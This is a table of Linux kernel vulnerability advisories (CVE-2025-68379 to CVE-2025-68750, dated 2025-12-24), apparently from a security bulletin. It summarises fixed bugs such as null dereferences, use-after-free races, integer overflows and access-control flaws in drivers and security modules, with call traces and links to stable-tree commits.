| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/rxe: Fix null deref on srq->rq.queue after resize failure A NULL pointer dereference can occur in rxe_srq_chk_attr() when ibv_modify_srq() is invoked twice in succession under certain error conditions. The first call may fail in rxe_queue_resize(), which leads rxe_srq_from_attr() to set srq->rq.queue = NULL. The second call then triggers a crash (null deref) when accessing srq->rq.queue->buf->index_mask. Call Trace: <TASK> rxe_modify_srq+0x170/0x480 [rdma_rxe] ? __pfx_rxe_modify_srq+0x10/0x10 [rdma_rxe] ? uverbs_try_lock_object+0x4f/0xa0 [ib_uverbs] ? rdma_lookup_get_uobject+0x1f0/0x380 [ib_uverbs] ib_uverbs_modify_srq+0x204/0x290 [ib_uverbs] ? __pfx_ib_uverbs_modify_srq+0x10/0x10 [ib_uverbs] ? tryinc_node_nr_active+0xe6/0x150 ? uverbs_fill_udata+0xed/0x4f0 [ib_uverbs] ib_uverbs_handler_UVERBS_METHOD_INVOKE_WRITE+0x2c0/0x470 [ib_uverbs] ? __pfx_ib_uverbs_handler_UVERBS_METHOD_INVOKE_WRITE+0x10/0x10 [ib_uverbs] ? uverbs_fill_udata+0xed/0x4f0 [ib_uverbs] ib_uverbs_run_method+0x55a/0x6e0 [ib_uverbs] ? __pfx_ib_uverbs_handler_UVERBS_METHOD_INVOKE_WRITE+0x10/0x10 [ib_uverbs] ib_uverbs_cmd_verbs+0x54d/0x800 [ib_uverbs] ? __pfx_ib_uverbs_cmd_verbs+0x10/0x10 [ib_uverbs] ? __pfx___raw_spin_lock_irqsave+0x10/0x10 ? __pfx_do_vfs_ioctl+0x10/0x10 ? ioctl_has_perm.constprop.0.isra.0+0x2c7/0x4c0 ? __pfx_ioctl_has_perm.constprop.0.isra.0+0x10/0x10 ib_uverbs_ioctl+0x13e/0x220 [ib_uverbs] ? __pfx_ib_uverbs_ioctl+0x10/0x10 [ib_uverbs] __x64_sys_ioctl+0x138/0x1c0 do_syscall_64+0x82/0x250 ? fdget_pos+0x58/0x4c0 ? ksys_write+0xf3/0x1c0 ? __pfx_ksys_write+0x10/0x10 ? do_syscall_64+0xc8/0x250 ? __pfx_vm_mmap_pgoff+0x10/0x10 ? fget+0x173/0x230 ? fput+0x2a/0x80 ? ksys_mmap_pgoff+0x224/0x4c0 ? do_syscall_64+0xc8/0x250 ? do_user_addr_fault+0x37b/0xfe0 ? clear_bhb_loop+0x50/0xa0 ? clear_bhb_loop+0x50/0xa0 ? clear_bhb_loop+0x50/0xa0 entry_SYSCALL_64_after_hwframe+0x76/0x7e | 2025-12-24 | not yet calculated | CVE-2025-68379 | https://git.kernel.org/stable/c/b8f6eeb87a76b6fb1f6381b0b2894568e1b784f7 https://git.kernel.org/stable/c/5dbeb421e137824aa9bd8358bdfc926a3965fc0d https://git.kernel.org/stable/c/bc4c14a3863cc0e03698caec9a0cdabd779776ee https://git.kernel.org/stable/c/503a5e4690ae14c18570141bc0dcf7501a8419b0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: ath11k: fix peer HE MCS assignment In ath11k_wmi_send_peer_assoc_cmd(), the peer's transmit MCS is sent to firmware as the receive MCS while the peer's receive MCS is sent as the transmit MCS, which goes against the firmware's definition. While connecting to a misbehaving AP that advertises 0xffff (meaning not supported) for the 160 MHz transmit MCS map, the firmware crashes because 0xffff is assigned to the he_mcs->rx_mcs_set field. Ext Tag: HE Capabilities [...] Supported HE-MCS and NSS Set [...] Rx and Tx MCS Maps 160 MHz [...] Tx HE-MCS Map 160 MHz: 0xffff Swap the assignment to fix this issue. As the HE rate control mask is meant to limit our own transmit MCS, it needs to go via the he_mcs->rx_mcs_set field. With the aforementioned swap done, a change is needed as well to apply it to the peer's receive MCS. Tested-on: WCN6855 hw2.1 PCI WLAN.HSP.1.1-03125-QCAHSPSWPL_V1_V2_SILICONZ_LITE-3.6510.41 Tested-on: QCN9274 hw2.0 PCI WLAN.WBE.1.4.1-00199-QCAHKSWPL_SILICONZ-1 | 2025-12-24 | not yet calculated | CVE-2025-68380 | https://git.kernel.org/stable/c/097c870b91817779e5a312c6539099a884b1fe2b https://git.kernel.org/stable/c/381096a417b7019896e93e86f4c585c592bf98e2 https://git.kernel.org/stable/c/6b1a0da75932353f66e710976ca85a7131f647ff https://git.kernel.org/stable/c/4a013ca2d490c73c40588d62712ffaa432046a04 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: asymmetric_keys - prevent overflow in asymmetric_key_generate_id Use check_add_overflow() to guard against potential integer overflows when adding the binary blob lengths and the size of an asymmetric_key_id structure and return ERR_PTR(-EOVERFLOW) accordingly. This prevents a possible buffer overflow when copying data from potentially malicious X.509 certificate fields that can be arbitrarily large, such as ASN.1 INTEGER serial numbers, issuer names, etc. | 2025-12-24 | not yet calculated | CVE-2025-68724 | https://git.kernel.org/stable/c/c73be4f51eed98fa0c7c189db8f279e1c86bfbf7 https://git.kernel.org/stable/c/6af753ac5205115e6c310c8c4236c01b59a1c44f https://git.kernel.org/stable/c/b7090a5c153105b9fd221a5a81459ee8cd5babd6 https://git.kernel.org/stable/c/df0845cf447ae1556c3440b8b155de0926cbaa56 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Do not let BPF test infra emit invalid GSO types to stack Yinhao et al. reported that their fuzzer tool was able to trigger a skb_warn_bad_offload() from netif_skb_features() -> gso_features_check(). When a BPF program - triggered via BPF test infra - pushes the packet to the loopback device via bpf_clone_redirect(), the mentioned offload warning can be seen. GSO-related features are then rightfully disabled. We get into this situation due to convert___skb_to_skb() setting gso_segs and gso_size but not gso_type. Technically, it makes sense that this warning triggers since the GSO properties are malformed due to the gso_type. Potentially, the gso_type could be marked non-trustworthy by setting it at least to SKB_GSO_DODGY without any other specific assumptions, but that also feels wrong given we should not go further into the GSO engine in the first place. The checks were added in 121d57af308d ("gso: validate gso_type in GSO handlers") because there were malicious (syzbot) senders that combine a protocol with a non-matching gso_type. If we would want to drop such packets, gso_features_check() currently only returns feature flags via netif_skb_features(), so one location for potentially dropping such skbs could be validate_xmit_unreadable_skb(), but on the other hand it would be an additional check in the fast path for a very corner case. Given bpf_clone_redirect() is the only place where BPF test infra could emit such packets, let's reject them right there. | 2025-12-24 | not yet calculated | CVE-2025-68725 | https://git.kernel.org/stable/c/fbea4c63b5385588cb44ab21f91e55e33c719a54 https://git.kernel.org/stable/c/04a899573fb87273a656f178b5f920c505f68875 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: aead - Fix reqsize handling Commit afddce13ce81d ("crypto: api - Add reqsize to crypto_alg") introduced cra_reqsize field in crypto_alg struct to replace type specific reqsize fields. It looks like this was introduced specifically for ahash and acomp from the commit description as subsequent commits add necessary changes in these alg frameworks. However, this is being recommended for use in all crypto algs instead of setting reqsize using crypto_*_set_reqsize(). Using cra_reqsize in aead algorithms, hence, causes memory corruptions and crashes as the underlying functions in the algorithm framework have not been updated to set the reqsize properly from cra_reqsize. [1] Add proper set_reqsize calls in the aead init function to properly initialize reqsize for these algorithms in the framework. [1]: https://gist.github.com/Pratham-T/24247446f1faf4b7843e4014d5089f6b | 2025-12-24 | not yet calculated | CVE-2025-68726 | https://git.kernel.org/stable/c/64377e66e187164bd6737112d07257f5f0feb681 https://git.kernel.org/stable/c/12b413f5460c393d1151a37f591140693eca0f84 https://git.kernel.org/stable/c/9b04d8f00569573796dd05397f5779135593eb24 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ntfs3: Fix uninit buffer allocated by __getname() Fix uninit errors caused after buffer allocation given to 'de'; by initializing the buffer with zeroes. The fix was found by using KMSAN. | 2025-12-24 | not yet calculated | CVE-2025-68727 | https://git.kernel.org/stable/c/4b1fd82848fdf0e01b3320815b261006c1722c3e https://git.kernel.org/stable/c/d88d4b455b6794f48d7adad52593f1700c7bd50e https://git.kernel.org/stable/c/b40a4eb4a0543d49686a6e693745009dac3b86a9 https://git.kernel.org/stable/c/9948dcb2f7b5a1bf8e8710eafaf6016e00be3ad6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ntfs3: fix uninit memory after failed mi_read in mi_format_new Fix a KMSAN un-init bug found by syzkaller. ntfs_get_bh() expects a buffer from sb_getblk(), that buffer may not be uptodate. We do not bring the buffer uptodate before setting it as uptodate. If the buffer were to not be uptodate, it could mean adding a buffer with un-init data to the mi record. Attempting to load that record will trigger KMSAN. Avoid this by setting the buffer as uptodate, if it's not already, by overwriting it. | 2025-12-24 | not yet calculated | CVE-2025-68728 | https://git.kernel.org/stable/c/7ce8f2028dfccb2161b905cf8ab85cdd9e93909c https://git.kernel.org/stable/c/46f2a881e5a7311d41551edb3915e4d4e8802341 https://git.kernel.org/stable/c/81ffe9a265df3e41534726b852ab08792e3d374d https://git.kernel.org/stable/c/73e6b9dacf72a1e7a4265eacca46f8f33e0997d6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: ath12k: Fix MSDU buffer types handling in RX error path Currently, packets received on the REO exception ring from unassociated peers are of MSDU buffer type, while the driver expects link descriptor type packets. These packets are not parsed further due to a return check on packet type in ath12k_hal_desc_reo_parse_err(), but the associated skb is not freed. This may lead to kernel crashes and buffer leaks. Hence to fix, update the RX error handler to explicitly drop MSDU buffer type packets received on the REO exception ring. This prevents further processing of invalid packets and ensures stability in the RX error handling path. Tested-on: QCN9274 hw2.0 PCI WLAN.WBE.1.4.1-00199-QCAHKSWPL_SILICONZ-1 | 2025-12-24 | not yet calculated | CVE-2025-68729 | https://git.kernel.org/stable/c/5ff5a9d71cdc49c3400f30583a784ad0a17d01ec https://git.kernel.org/stable/c/ab0554f51e5f2b9506e8a09e8accd02f00056729 https://git.kernel.org/stable/c/36f9edbb9d0fc36c865c74f3c1ad8e1261ad3981 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: accel/ivpu: Fix page fault in ivpu_bo_unbind_all_bos_from_context() Don't add BO to the vdev->bo_list in ivpu_gem_create_object(). When failure happens inside drm_gem_shmem_create(), the BO is not fully created and ivpu_gem_bo_free() callback will not be called causing a deleted BO to be left on the list. | 2025-12-24 | not yet calculated | CVE-2025-68730 | https://git.kernel.org/stable/c/8172838a284c27190fa6782c2740a97020434750 https://git.kernel.org/stable/c/c9ef5ccd8bd9bcf598b6d3f77e7eb4dde7149aec https://git.kernel.org/stable/c/8b694b405a84696f1d964f6da7cf9721e68c4714 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: accel/amdxdna: Fix an integer overflow in aie2_query_ctx_status_array() The unpublished smatch static checker reported a warning. drivers/accel/amdxdna/aie2_pci.c:904 aie2_query_ctx_status_array() warn: potential user controlled sizeof overflow 'args->num_element * args->element_size' '1-u32max(user) * 1-u32max(user)' Even though this will not cause a real issue, it is better to put a reasonable limit on element_size and num_element. Add a condition to make sure the input element_size <= 4K and num_element <= 1K. | 2025-12-24 | not yet calculated | CVE-2025-68731 | https://git.kernel.org/stable/c/359653edd5374fbba28f93043554dcc494aee85f https://git.kernel.org/stable/c/9e16c8bf9aebf629344cfd4cd5e3dc7d8c3f7d82 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: gpu: host1x: Fix race in syncpt alloc/free Fix race condition between host1x_syncpt_alloc() and host1x_syncpt_put() by using kref_put_mutex() instead of kref_put() + manual mutex locking. This ensures no thread can acquire the syncpt_mutex after the refcount drops to zero but before syncpt_release acquires it. This prevents races where syncpoints could be allocated while still being cleaned up from a previous release. Remove explicit mutex locking in syncpt_release as kref_put_mutex() handles this atomically. | 2025-12-24 | not yet calculated | CVE-2025-68732 | https://git.kernel.org/stable/c/4e6e07ce0197aecfb6c4a62862acc93b3efedeb7 https://git.kernel.org/stable/c/d138f73ffb0c57ded473c577719e6e551b7b1f27 https://git.kernel.org/stable/c/79197c6007f2afbfd7bcf5b9b80ccabf8483d774 https://git.kernel.org/stable/c/c7d393267c497502fa737607f435f05dfe6e3d9b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: smack: fix bug: unprivileged task can create labels If an unprivileged task is allowed to relabel itself (/smack/relabel-self is not empty), it can freely create new labels by writing their names into own /proc/PID/attr/smack/current This occurs because do_setattr() imports the provided label in advance, before checking "relabel-self" list. This change ensures that the "relabel-self" list is checked before importing the label. | 2025-12-24 | not yet calculated | CVE-2025-68733 | https://git.kernel.org/stable/c/ac9fce2efabad37c338aac86fbe100f77a080e59 https://git.kernel.org/stable/c/64aa81250171b6bb6803e97ea7a5d73bfa061f6e https://git.kernel.org/stable/c/60e8d49989410a7ade60f5dadfcd979c117d05c0 https://git.kernel.org/stable/c/c147e13ea7fe9f118f8c9ba5e96cbd644b00d6b3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: isdn: mISDN: hfcsusb: fix memory leak in hfcsusb_probe() In hfcsusb_probe(), the memory allocated for ctrl_urb gets leaked when setup_instance() fails with an error code. Fix that by freeing the urb before freeing the hw structure. Also change the error paths to use the goto ladder style. Compile tested only. Issue found using a prototype static analysis tool. | 2025-12-24 | not yet calculated | CVE-2025-68734 | https://git.kernel.org/stable/c/475032fa2bb82ffb592c321885e917e39f47357f https://git.kernel.org/stable/c/adb7577e23a431fc53aa1b6107733c0d751015fb https://git.kernel.org/stable/c/b70c24827e11fdc71465f9207e974526fb457bb9 https://git.kernel.org/stable/c/3f7c72bc73c4e542fde14cce017549d8a0b61a3c https://git.kernel.org/stable/c/03695541b3349bc40bf5d6563d44d6147fb20260 https://git.kernel.org/stable/c/6dce43433e0635e7b00346bc937b69ce48ea71bb https://git.kernel.org/stable/c/ea7936304ed74ab7f965d17f942a173ce91a5ca8 https://git.kernel.org/stable/c/3f978e3f1570155a1327ffa25f60968bc7b9398f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/panthor: Prevent potential UAF in group creation This commit prevents the possibility of a use-after-free issue in the GROUP_CREATE ioctl function, which arose because a pointer to the group is accessed in that ioctl function after storing it in the Xarray. A malicious userspace can second-guess the handle of a group and try to call the GROUP_DESTROY ioctl from another thread around the same time as the GROUP_CREATE ioctl. To prevent the use-after-free exploit, this commit uses a mark on an entry of the group pool Xarray which is added just before returning from the GROUP_CREATE ioctl function. The mark is checked for all ioctls that specify the group handle, so userspace won't be able to delete a group that isn't marked yet. v2: Add R-bs and fixes tags | 2025-12-24 | not yet calculated | CVE-2025-68735 | https://git.kernel.org/stable/c/deb8b2491f6b9882ae02d7dc2651c7bf4f3b7e05 https://git.kernel.org/stable/c/c646ebff3fa571e7ea974235286fb9ed3edc260c https://git.kernel.org/stable/c/eec7e23d848d2194dd8791fcd0f4a54d4378eecd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: landlock: Fix handling of disconnected directories Disconnected files or directories can appear when they are visible and opened from a bind mount, but have been renamed or moved from the source of the bind mount in a way that makes them inaccessible from the mount point (i.e. out of scope). Previously, access rights tied to files or directories opened through a disconnected directory were collected by walking the related hierarchy down to the root of the filesystem, without taking into account the mount point because it couldn't be found. This could lead to inconsistent access results, potential access right widening, and hard-to-debug renames, especially since such paths cannot be printed. For a sandboxed task to create a disconnected directory, it needs to have write access (i.e. FS_MAKE_REG, FS_REMOVE_FILE, and FS_REFER) to the underlying source of the bind mount, and read access to the related mount point. Because a sandboxed task cannot acquire more access rights than those defined by its Landlock domain, this could lead to inconsistent access rights due to missing permissions that should be inherited from the mount point hierarchy, while inheriting permissions from the filesystem hierarchy hidden by this mount point instead. Landlock now handles files and directories opened from disconnected directories by taking into account the filesystem hierarchy when the mount point is not found in the hierarchy walk, and also always taking into account the mount point from which these disconnected directories were opened. This ensures that a rename is not allowed if it would widen access rights [1]. The rationale is that, even if disconnected hierarchies might not be visible or accessible to a sandboxed task, relying on the collected access rights from them improves the guarantee that access rights will not be widened during a rename because of the access right comparison between the source and the destination (see LANDLOCK_ACCESS_FS_REFER). It may look like this would grant more access on disconnected files and directories, but the security policies are always enforced for all the evaluated hierarchies. This new behavior should be less surprising to users and safer from an access control perspective. Remove a wrong WARN_ON_ONCE() canary in collect_domain_accesses() and fix the related comment. Because opened files have their access rights stored in the related file security properties, there is no impact for disconnected or unlinked files. | 2025-12-24 | not yet calculated | CVE-2025-68736 | https://git.kernel.org/stable/c/cadb28f8b3fd6908e3051e86158c65c3a8e1c907 https://git.kernel.org/stable/c/49c9e09d961025b22e61ef9ad56aa1c21b6ce2f1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: arm64/pageattr: Propagate return value from __change_memory_common The rodata=on security measure requires that any code path which does vmalloc -> set_memory_ro/set_memory_rox must protect the linear map alias too. Therefore, if such a call fails, we must abort set_memory_* and caller must take appropriate action; currently we are suppressing the error, and there is a real chance of such an error arising post commit a166563e7ec3 ("arm64: mm: support large block mapping when rodata=full"). Therefore, propagate any error to the caller. | 2025-12-24 | not yet calculated | CVE-2025-68737 | https://git.kernel.org/stable/c/3e2fc1e57a5361633a4bf4222640c6bfe41ff8ea https://git.kernel.org/stable/c/e5efd56fa157d2e7d789949d1d64eccbac18a897 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: mt76: mt7996: fix null pointer deref in mt7996_conf_tx() If a link does not have an assigned channel yet, mt7996_vif_link returns NULL. We still need to store the updated queue settings in that case, and apply them later. Move the location of the queue params to within struct mt7996_vif_link. | 2025-12-24 | not yet calculated | CVE-2025-68738 | https://git.kernel.org/stable/c/96841352aaba7723c20afb3a5356746810ef8198 https://git.kernel.org/stable/c/b8f34c1c5c4f5130c20e3253c95ba1d844d402b9 https://git.kernel.org/stable/c/79277f8ad15ec5f255ed0e1427c7a8a3e94e7f52 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: PM / devfreq: hisi: Fix potential UAF in OPP handling Ensure all required data is acquired before calling dev_pm_opp_put(opp) to maintain correct resource acquisition and release order. | 2025-12-24 | not yet calculated | CVE-2025-68739 | https://git.kernel.org/stable/c/efb028b07f7b2d141b91c2fab5276b601f0d0dbe https://git.kernel.org/stable/c/469b0b8ce08818f3e4f01d2fa8d0dadeab501e1f https://git.kernel.org/stable/c/26dd44a40096468396b6438985d8e44e0743f64c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ima: Handle error code returned by ima_filter_rule_match() In ima_match_rules(), if ima_filter_rule_match() returns -ENOENT due to the rule being NULL, the function incorrectly skips the 'if (!rc)' check and sets 'result = true'. The LSM rule is considered a match, causing extra files to be measured by IMA. This issue can be reproduced in the following scenario: After unloading the SELinux policy module via 'semodule -d', if an IMA measurement is triggered before ima_lsm_rules is updated, in ima_match_rules(), the first call to ima_filter_rule_match() returns -ESTALE. This causes the code to enter the 'if (rc == -ESTALE && !rule_reinitialized)' block, perform ima_lsm_copy_rule() and retry. In ima_lsm_copy_rule(), since the SELinux module has been removed, the rule becomes NULL, and the second call to ima_filter_rule_match() returns -ENOENT. This bypasses the 'if (!rc)' check and results in a false match. Call trace: selinux_audit_rule_match+0x310/0x3b8 security_audit_rule_match+0x60/0xa0 ima_match_rules+0x2e4/0x4a0 ima_match_policy+0x9c/0x1e8 ima_get_action+0x48/0x60 process_measurement+0xf8/0xa98 ima_bprm_check+0x98/0xd8 security_bprm_check+0x5c/0x78 search_binary_handler+0x6c/0x318 exec_binprm+0x58/0x1b8 bprm_execve+0xb8/0x130 do_execveat_common.isra.0+0x1a8/0x258 __arm64_sys_execve+0x48/0x68 invoke_syscall+0x50/0x128 el0_svc_common.constprop.0+0xc8/0xf0 do_el0_svc+0x24/0x38 el0_svc+0x44/0x200 el0t_64_sync_handler+0x100/0x130 el0t_64_sync+0x3c8/0x3d0 Fix this by changing 'if (!rc)' to 'if (rc <= 0)' to ensure that error codes like -ENOENT do not bypass the check and accidentally result in a successful match. | 2025-12-24 | not yet calculated | CVE-2025-68740 | https://git.kernel.org/stable/c/c2238d487a640ae3511e1b6f4640ab27ce10d7f6 https://git.kernel.org/stable/c/de4431faf308d0c533cb386f5fa9af009bc86158 https://git.kernel.org/stable/c/32952c4f4d1b2deb30dce72ba109da808a9018e1 https://git.kernel.org/stable/c/738c9738e690f5cea24a3ad6fd2d9a323cf614f6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: qla2xxx: Fix improper freeing of purex item In qla2xxx_process_purls_iocb(), an item is allocated via qla27xx_copy_multiple_pkt(), which internally calls qla24xx_alloc_purex_item(). The qla24xx_alloc_purex_item() function may return a pre-allocated item from a per-adapter pool for small allocations, instead of dynamically allocating memory with kzalloc(). An error handling path in qla2xxx_process_purls_iocb() incorrectly uses kfree() to release the item. If the item was from the pre-allocated pool, calling kfree() on it is a bug that can lead to memory corruption. Fix this by using the correct deallocation function, qla24xx_free_purex_item(), which properly handles both dynamically allocated and pre-allocated items. | 2025-12-24 | not yet calculated | CVE-2025-68741 | https://git.kernel.org/stable/c/8e9f0a0717ba31d5842721627ade1e62d7aec012 https://git.kernel.org/stable/c/cfe3e2f768d248fd3d965d561d0768a56dd0b9f8 https://git.kernel.org/stable/c/5fa1c8226b4532ad7011d295d3ab4ad45df105ae https://git.kernel.org/stable/c/78b1a242fe612a755f2158fd206ee6bb577d18ca |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Fix invalid prog->stats access when update_effective_progs fails Syzkaller triggers an invalid memory access issue following fault injection in update_effective_progs. The issue can be described as follows: __cgroup_bpf_detach update_effective_progs compute_effective_progs bpf_prog_array_alloc <-- fault inject purge_effective_progs /* change to dummy_bpf_prog */ array->items[index] = &dummy_bpf_prog.prog ---softirq start--- __do_softirq ... __cgroup_bpf_run_filter_skb __bpf_prog_run_save_cb bpf_prog_run stats = this_cpu_ptr(prog->stats) /* invalid memory access */ flags = u64_stats_update_begin_irqsave(&stats->syncp) ---softirq end--- static_branch_dec(&cgroup_bpf_enabled_key[atype]) The reason is that fault injection caused update_effective_progs to fail and then changed the original prog into dummy_bpf_prog.prog in purge_effective_progs. Then a softirq came, and accessing the members of dummy_bpf_prog.prog in the softirq triggers invalid mem access. To fix it, skip updating stats when stats is NULL. | 2025-12-24 | not yet calculated | CVE-2025-68742 | https://git.kernel.org/stable/c/539137e3038ce6f953efd72110110f03c14c7d97 https://git.kernel.org/stable/c/56905bb70c8b88421709bb4e32fcba617aa37d41 https://git.kernel.org/stable/c/2579c356ccd35d06238b176e4b460978186d804b https://git.kernel.org/stable/c/7dc211c1159d991db609bdf4b0fb9033c04adcbc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mshv: Fix create memory region overlap check The current check is incorrect; it only checks if the beginning or end of a region is within an existing region. This doesn't account for userspace specifying a region that begins before and ends after an existing region. Change the logic to a range intersection check against gfns and uaddrs for each region. Remove mshv_partition_region_by_uaddr() as it is no longer used. | 2025-12-24 | not yet calculated | CVE-2025-68743 | https://git.kernel.org/stable/c/2183924dd834e0703f87e17c17e689bcbf55d69d https://git.kernel.org/stable/c/ab3e7a78d83a61d335458cfe2e4d17eba69ae73d https://git.kernel.org/stable/c/ba9eb9b86d232854e983203dc2fb1ba18e316681 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Free special fields when update [lru_,]percpu_hash maps As [lru_,]percpu_hash maps support BPF_KPTR_{REF,PERCPU}, missing calls to 'bpf_obj_free_fields()' in 'pcpu_copy_value()' could cause the memory referenced by BPF_KPTR_{REF,PERCPU} fields to be held until the map gets freed. Fix this by calling 'bpf_obj_free_fields()' after 'copy_map_value[,_long]()' in 'pcpu_copy_value()'. | 2025-12-24 | not yet calculated | CVE-2025-68744 | https://git.kernel.org/stable/c/3bf1378747e251571e0de15e7e0a6bf2919044e7 https://git.kernel.org/stable/c/96a5cb7072cabbac5c66ac9318242c3bdceebb68 https://git.kernel.org/stable/c/4a03d69cece145e4fb527464be29c3806aa3221e https://git.kernel.org/stable/c/6af6e49a76c9af7d42eb923703e7648cb2bf401a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: qla2xxx: Clear cmds after chip reset Commit aefed3e5548f ("scsi: qla2xxx: target: Fix offline port handling and host reset handling") caused two problems: 1. Commands sent to FW, after chip reset got stuck and never freed as FW is not going to respond to them anymore. 2. BUG_ON(cmd->sg_mapped) in qlt_free_cmd(). Commit 26f9ce53817a ("scsi: qla2xxx: Fix missed DMA unmap for aborted commands") attempted to fix this, but introduced another bug under different circumstances when two different CPUs were racing to call qlt_unmap_sg() at the same time: BUG_ON(!valid_dma_direction(dir)) in dma_unmap_sg_attrs(). So revert "scsi: qla2xxx: Fix missed DMA unmap for aborted commands" and partially revert "scsi: qla2xxx: target: Fix offline port handling and host reset handling" at __qla2x00_abort_all_cmds. | 2025-12-24 | not yet calculated | CVE-2025-68745 | https://git.kernel.org/stable/c/5c1fb3fd05da3d55b8cbc42d7d660b313cbdc936 https://git.kernel.org/stable/c/d46c69a087aa3d1513f7a78f871b80251ea0c1ae |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: spi: tegra210-quad: Fix timeout handling When the CPU that the QSPI interrupt handler runs on (typically CPU 0) is excessively busy, it can lead to rare cases of the IRQ thread not running before the transfer timeout is reached. While handling the timeouts, any pending transfers are cleaned up and the message that they correspond to is marked as failed, which leaves the curr_xfer field pointing at stale memory. To avoid this, clear curr_xfer to NULL upon timeout and check for this condition when the IRQ thread is finally run. While at it, also make sure to clear interrupts on failure so that new interrupts can be run. A better, more involved, fix would move the interrupt clearing into a hard IRQ handler. Ideally we would also want to signal that the IRQ thread no longer needs to be run after the timeout is hit to avoid the extra check for a valid transfer. | 2025-12-24 | not yet calculated | CVE-2025-68746 | https://git.kernel.org/stable/c/551060efb156c50fe33799038ba8145418cfdeef https://git.kernel.org/stable/c/bb0c58be84f907285af45657c1d4847b960a12bf https://git.kernel.org/stable/c/01bbf25c767219b14c3235bfa85906b8d2cb8fbc https://git.kernel.org/stable/c/b4e002d8a7cee3b1d70efad0e222567f92a73000 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/panthor: Fix UAF on kernel BO VA nodes If the MMU is down, panthor_vm_unmap_range() might return an error. We expect the page table to be updated still, and if the MMU is blocked, the rest of the GPU should be blocked too, so no risk of accessing physical memory returned to the system (which the current code doesn't cover for anyway). Proceed with the rest of the cleanup instead of bailing out and leaving the va_node inserted in the drm_mm, which leads to UAF when other adjacent nodes are removed from the drm_mm tree. | 2025-12-24 | not yet calculated | CVE-2025-68747 | https://git.kernel.org/stable/c/5a0060ddfc1fcfdb0f7b4fa1b7b3b0c436151391 https://git.kernel.org/stable/c/1123eadb843588b361c96f53a771202b7953154f https://git.kernel.org/stable/c/0612704b6f6ddf2ae223019c52148c5ac76cf70e https://git.kernel.org/stable/c/98dd5143447af0ee33551776d8b2560c35d0bc4a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/panthor: Fix UAF race between device unplug and FW event processing The function panthor_fw_unplug() will free the FW memory sections. The problem is that there could still be pending FW events which are yet not handled at this point. process_fw_events_work() can in this case try to access said freed memory. Simply call disable_work_sync() to both drain and prevent future invocation of process_fw_events_work(). | 2025-12-24 | not yet calculated | CVE-2025-68748 | https://git.kernel.org/stable/c/31db188355a49337e3e8ec98b99377e482eab22c https://git.kernel.org/stable/c/5e3ff56d4cb591daea70786d07dc21d06dc34108 https://git.kernel.org/stable/c/6c1da9ae2c123a9ffda5375e64cc81f9ed3cc04a https://git.kernel.org/stable/c/7051f6ba968fa69918d72cc26de4d6cf7ea05b90 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: accel/ivpu: Fix race condition when unbinding BOs Fix 'Memory manager not clean during takedown' warning that occurs when ivpu_gem_bo_free() removes the BO from the BOs list before it gets unmapped. Then file_priv_unbind() triggers a warning in drm_mm_takedown() during context teardown. Protect the unmapping sequence with bo_list_lock to ensure the BO is always fully unmapped when removed from the list. This ensures the BO is either fully unmapped at context teardown time or present on the list and unmapped by file_priv_unbind(). | 2025-12-24 | not yet calculated | CVE-2025-68749 | https://git.kernel.org/stable/c/fb16493ebd8f171bcf0772262619618a131f30f7 https://git.kernel.org/stable/c/d71333ffdd3707d84cfb95acfaf8ba892adc066b https://git.kernel.org/stable/c/00812636df370bedf4e44a0c81b86ea96bca8628 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: potential integer overflow in usbg_make_tpg() The variable tpgt in usbg_make_tpg() is defined as unsigned long and is assigned to tpgt->tport_tpgt, which is defined as u16. This may cause an integer overflow when tpgt is greater than USHRT_MAX (65535). I haven't tried to trigger it myself, but it is possible to trigger it by calling usbg_make_tpg() with a large value for tpgt. I modified the type of tpgt to match tpgt->tport_tpgt and adjusted the relevant code accordingly. This patch is similar to commit 59c816c1f24d ("vhost/scsi: potential memory corruption"). | 2025-12-24 | not yet calculated | CVE-2025-68750 | https://git.kernel.org/stable/c/0861b9cb2ff519b7c5a3b1dd52a343e18c4efb24 https://git.kernel.org/stable/c/603a83e5fee38a950bfcfb2f36449311fa00a474 https://git.kernel.org/stable/c/6f77e344515b5258edb3988188311464209b1c7c https://git.kernel.org/stable/c/6722e080b5b39ab7471386c73d0c1b39572f943c https://git.kernel.org/stable/c/a33f507f36d5881f602dab581ab0f8d22b49762c https://git.kernel.org/stable/c/358d5ba08f1609c34a054aed88c431844d09705a https://git.kernel.org/stable/c/620a5e1e84a3a7004270703a118d33eeb1c0f368 https://git.kernel.org/stable/c/153874010354d050f62f8ae25cbb960c17633dc5 |
